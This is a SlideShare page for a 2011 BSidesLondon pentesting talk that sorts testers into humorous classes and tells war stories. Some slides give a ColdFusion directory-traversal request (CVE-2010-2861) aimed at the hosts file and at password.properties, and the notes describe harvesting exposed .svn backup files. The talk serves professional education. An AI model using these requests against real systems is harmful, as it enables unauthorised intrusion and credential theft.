Breaking, Entering and Pentesting

2,155 views
2,049 views

Published on

BSidesLondon 20th April 2011 - Steve Lord (@stevelord)
----------------------------------------------------------------
The majority of Penetration testing teams have staff falling into 3 of four categories: Nessus Monkeys, Experts-in-Training and Jaded Cynicists. This is a talk about improving penetration testing skills to get to the rare fourth Jedi master level normally occupied by less than 1% of the team where nothing is impossible. The talk will be backed up by video footage from actual penetration tests as well as live demos and a Q&A session.
---- for more about Steve
http://www.mandalorian.com

0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,155
On SlideShare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
0
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide
  • I'm sure many of you will have come across this before, when I heard it I interpreted it as a sign of interesting things to come.
  • How many pentesters does it take to change a light bulb? It's the customer's job to change it, we just break stuff. In theory the role of the pentester is to assist the information assurance process by providing a technical assessment of actual threats. In practice.
  • The system was connected to the Internet, as well as to various HMG networks This was part of a mandated annual IT Health Check Can you spot what's wrong with this picture?
  • Said to me during unlawful detention after 'impossible' route back to customer network from Indian Offshorer identified And after we'd found all manner of hideous stuff on the network proving that while they may have a duty, it wasn't being exercised
  • I made this all up, but run with me
  • Wandering off-scope See also, “Hey guys, I cracked this WEP network last night” Not choosing company wisely “ But those d00dz in #defacers really know their stuff” Thinking it's someone else's job to teach you “ I didn't know that'd down the server”
  • Wandering off-scope See also, “Hey guys, I cracked this WEP network last night” Not choosing company wisely “ But those d00dz in #defacers really know their stuff” Thinking it's someone else's job to teach you “ I didn't know that'd down the server”
  • Understands an RFC
  • Experience increases Realisation of inability to effect change Depression Alcoholism Drugs Divorce Etc. As they transcend Able to take TigerScheme QSTM May pass first time Should pass second time
  • The system was connected to the Internet, as well as to various HMG networks This was part of a mandated annual IT Health Check Can you spot what's wrong with this picture?
  • I have a lot of respect for CLAS consultants, I was one for a year. Sadly this guy wasn't one of them. Yes he talked a bit like Hyperchicken too.
  • The majority of team leaders fall into this Death by PCI/DII
  • Putting up with management, followed by doing it
  • “ But why would you want to leave?” There are many reasons, but pentesting is a strange job and if as with anywhere else they don't feel valued or that they're achieving they'll move on. “ You'll have to go into management to grow” Not only will you lose one of your best technical resources, but you'll gain someone probably unprepared for the horrors of management interaction. “ How do you feel about writing an RMADS?” Up until this point, the Jaded Cynic may have heard of IS1 but is unlikely to fully understand the fundamentals that drive the IAMM and SPF. Policy is mostly boring for pentesters.
  • We found something on a pentest. Got all excited, wanted to call it Cross-Site Squirting then marketing looked up 'squirting' on google with safesearch off. Marketing doesn't click on links any more. Which was just as well, as we found out that it was an obscure issue, but documented on the interwebs. So we wrote a tool instead to automate it
  • Subversion uses webdav to handle checkins and checkouts. Without webdav you can't just rock up and check out, which sucks because sometimes even with webdav you can't checkout as someone was clever with the permissions.
  • Subversion uses the .svn directory structure Beneath this is an entries file for each subdirectory The entries file lists file and directory names that exist beneath the current directory root Subversion creates a backup of each file, with the name .svn-base at the end
  • Where this gets interesting is this: Most HTTP servers treat .svn-base as an unknown extension so serve it as text/plain or similar This means that if you can parse the entries files and directory structures you can download all the .svn-base files And then you have a full backup of the svn tree
  • Hidden admin interface Debug=1 variable Various RFI bugs
  • Assimilates new information at lightning speed Makes their own tools Does or does not – there is no try Commercially aware Balances value and coverage At least moderately socially balanced Attempts to understand customer threat landscape before testing Goes beyond attack trees Builds attack avenues Scenario based testing
  • Alright, one last war story
  • Went to a Call Centre Found a PC Logged onto PC Hacked Siebel using MS Access and ODBC Forgot to link tables – FAIL Access tries to download full Siebel database across WAN link
  • Putting up with management, followed by doing it
  • Breaking, Entering and Pentesting

    1. 1. Breaking, Entering and Pentesting - Steve Lord
    2. 2. The Things Customers Say To me, at least... <ul><li>From a leading SI: </li><ul><li>“ That's not a risk. It's internal.” </li></ul></ul>
    3. 3. Who is this guy? And what does he know? <ul><li>Steve Lord </li><ul><li>Founder, Mandalorian
    4. 4. TigerScheme SST and TP member
    5. 5. Co-Founder, 44Con - http://www.44con.com/ </li></ul><li>12 Year Pentesting V ictim eteran </li><ul><li>Big gov, small gov, financials, defence, NGOs, small countries, small continents </li></ul></ul>
    6. 6. What Does A Pentester Do? Other than drinking, natch
    7. 7. What Does A Pentester Do? In practice
    8. 8. What Does A Pentester Do? Don't believe me? <ul><li>3 months ago we tested a government system
    9. 9. During the test we found a ColdFusion System
    10. 10. Tried requesting the following: </li><ul><li>/CFIDE/administrator/settings/mappings.cfm?locale=................windowssystem32driversetchosts%00en </li></ul></ul>
    11. 11. What Does A Pentester Do? Don't believe me?
    12. 12. Did You Spot The Gorilla? Really? <ul><li>Shall we try again? </li></ul>
    13. 13. What Does A Pentester Do? Don't believe me?
    14. 14. What Does A Pentester Do? Grading time <ul><li>It was vulnerable to CVE-2010-2861 </li><ul><li>1 point </li></ul></ul>
    15. 15. What Does A Pentester Do? Grading time <ul><li>The /CFIDE/administrator/ path was accessible from the Internet </li><ul><li>1 point </li></ul></ul>
    16. 16. What Does A Pentester Do? Grading time <ul><li>That Adobe acquired Macromedia in 2005, and as such this thing's been open for how long since an upgrade? </li><ul><li>2 points – report due by end of talk pls </li></ul></ul>
    17. 17. What Does A Pentester Do? Keep it going harder <ul><li>Can we get admin passwords? </li><ul><li>....libpassword.properties </li></ul><li>Add Scheduled Task </li></ul>
    18. 18. What Does A Pentester Do? Keep it going harder <ul><li>Can we get admin passwords? </li><ul><li>....libpassword.properties </li></ul><li>Add Scheduled Task
    19. 19. Leading to... </li></ul>
    20. 20. The Things Customers Say To me, at least... <ul><li>From another leading SI: </li><ul><li>“ We have a duty of care to protect customer data” </li></ul></ul>
    21. 21. Classes of Pentester You mean there's more than one? <ul><li>Pentesters can be grouped into several classes based on: </li><ul><li>Experience
    22. 22. Attitude
    23. 23. Motivation
    24. 24. Ability </li></ul></ul>
    25. 25. Classes of Pentester The Nessus Monkey <ul><li>Often fresh out of Uni
    26. 26. Runs tools
    27. 27. Follows methodology
    28. 28. Good at filling in checklists
    29. 29. Can do an OPTIONS request in a single bound
    30. 30. Might even know how to drive Ubuntu </li></ul>
    31. 31. Classes of Pentester The Nessus Monkey
    32. 32. Classes of Pentester Common Nessus Monkey Mistakes <ul><li>Wandering off-scope
    33. 33. Not choosing company wisely
    34. 34. Thinking it's someone else's job to teach you </li></ul>
    35. 35. Classes of Pentester Even Nessus Monkeys get root <ul><li>Nessus reports Tomcat HTML interface
    36. 36. Nessus Monkey fires up metasploit
    37. 37. Nessus Monkey own system
    38. 38. Nessus Monkey happy
    39. 39. Nessus Monkey graduates </li></ul>
    40. 40. Classes of Pentester Experts in Training <ul><li>Has written a tool
    41. 41. Knows a programming language
    42. 42. Can use a Linux commandline
    43. 43. Has read an RFC
    44. 44. Hungry for root, hungry to learn </li></ul>
    45. 45. Classes of Pentester Experts in Training
    46. 46. Classes of Pentester Experts In Training Observations <ul><li>As skills increase </li><ul><li>Awareness of problem space (usually) increases
    47. 47. Experience increases
    48. 48. QSTM/CTM ready </li></ul></ul>
    49. 49. War Stories With pictures <ul><li>SQL Injection on a box
    50. 50. Nessus Monkey runs SQLmap
    51. 51. Team Lead rolls his own
    52. 52. Sometimes SQLmap isn't quick enough </li><ul><li>Which leads to... </li></ul></ul>
    53. 53. War Stories With pictures
    54. 54. The Things Customers Say To me, at least... <ul><li>From a CLAS consultant: </li><ul><li>“ Lets call this what it is, an unjustified unlimited hacking exercise” </li></ul></ul>
    55. 55. Classes of Pentester Jaded Cynic <ul><li>Hit the tech ceiling
    56. 56. Changes the dates on old reports and submits on retests
    57. 57. It's just a saga now </li></ul>
    58. 58. Classes of Pentester Jaded Cynic
    59. 59. Classes of Pentester Jaded Cynic - Key Factors in Cool Stuff Time <ul><li>Certifications </li><ul><li>TigerScheme SST every 3 years </li><ul><li>~20% 1 st time pass rate, 2 day exam </li></ul></ul><li>Management
    60. 60. Marriage
    61. 61. Kids </li></ul>
    62. 62. Classes of Pentester Jaded Cynic – Mistakes Employers Make <ul><li>“ But why would you want to leave?”
    63. 63. “ You'll have to go into management to grow”
    64. 64. “ How do you feel about writing an RMADS?” </li></ul>
    65. 65. But Don't Be Sad Well, not just yet... Obligatory tool release moment pending, journalists please stand by, the marketing team have been very busy.
    66. 66. War Stories The Jaded Cynic and the Web App <ul><li>PHP-based Web app </li><ul><li>.svn/Entries found by Nikto </li></ul><li>Has a poke round .svn-land
    67. 67. Which leads to... </li></ul>
    68. 68. War Stories The Jaded Cynic and the Web App
    69. 69. War Stories The Jaded Cynic and the Web App
    70. 70. War Stories The Jaded Cynic and the Web App <ul><li>Subverted </li><ul><li>Generates a list of source backup files for wget
    71. 71. http://www.mandalorian.com/resources/releases/ </li></ul><li>Found some goodies :) </li></ul>
    72. 72. The Things Customers Say To me, at least... <ul><li>From an IT Service Provider: </li><ul><li>“ If any of our systems go down, we're throwing you off-site” </li></ul></ul>
    73. 73. The Things Customers Say To me, at least...
    74. 74. There is another class of pentester...
    75. 75. Classes of Pentester Jedi Master
    76. 76. Classes of Pentester Jedi Master
    77. 77. Classes of Pentester Jedi Masters – specific qualities <ul><li>Is Relentless
    78. 78. Has blood
    79. 79. Commercially aware
    80. 80. Thinks beyond attack trees </li></ul>
    81. 81. Classes of Pentester Jedi Master
    82. 82. War Stories Jedi Master Grade <ul><li>Sorry I don't have mitochlorians </li><ul><li>But I'm trying to be better </li></ul></ul>
    83. 83. The Things Customers Say To me, at least... <ul><li>From *yet* another leading SI: </li><ul><li>“ A particularly vigilant DBA spotted your tests” </li></ul></ul>
    84. 84. Tonight at DC4420 A taste of things to come
    85. 85. Thanks for having me It keeps me off the streets This presentation brought to you by Caravan Palace, Parov Stelar, Daft Punk and Beer. Hmmm... Beer. My next talk will be at DC4420 this evening about strategies for evading automated detection and manual analysis. Hope to see you there! CC-NC-SA ©2011 Mandalorian.

    ×